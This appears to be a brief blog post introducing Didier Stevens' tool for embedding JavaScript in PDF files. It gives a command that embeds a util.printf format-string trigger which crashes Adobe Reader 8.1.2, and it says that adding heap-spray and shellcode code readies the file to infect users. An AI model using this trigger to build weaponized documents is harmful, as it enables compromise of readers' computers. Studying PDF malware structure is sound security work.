Actually Didiers Stevens has come out with a tool that allows you to create a PDF file and embed JavaScript code into the file. It is a nice tool which allow us to learn about the structure of PDF file and how JavaScript code is embedded into it. Have a look it in here.
Example PDF file that’ll crash Adobe Reader 8.1.2 on XP SP2
$ python make-pdf-javascript.py -j “util.printf(’%5000f’, 0.0);” donotopen.pdf
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhbiH4mEZth6DEdJYz7DuKdAG64h3zmOAVZJ-Yyww4Bik04pmuU9YSEPG5bsau5bKFgA8A7n8hSNs_SQ4oGoVgOeNrZU3v5KTi_c5DjJTgZp2jsPJKJiQj4DIuOeFxe2458veB8WVNhxcr_/s1600/screencap2.png)
From here, with a complete JavaScript code to do heapspray and execute shellcode, the PDF file is ready to get to the user and infect the computer.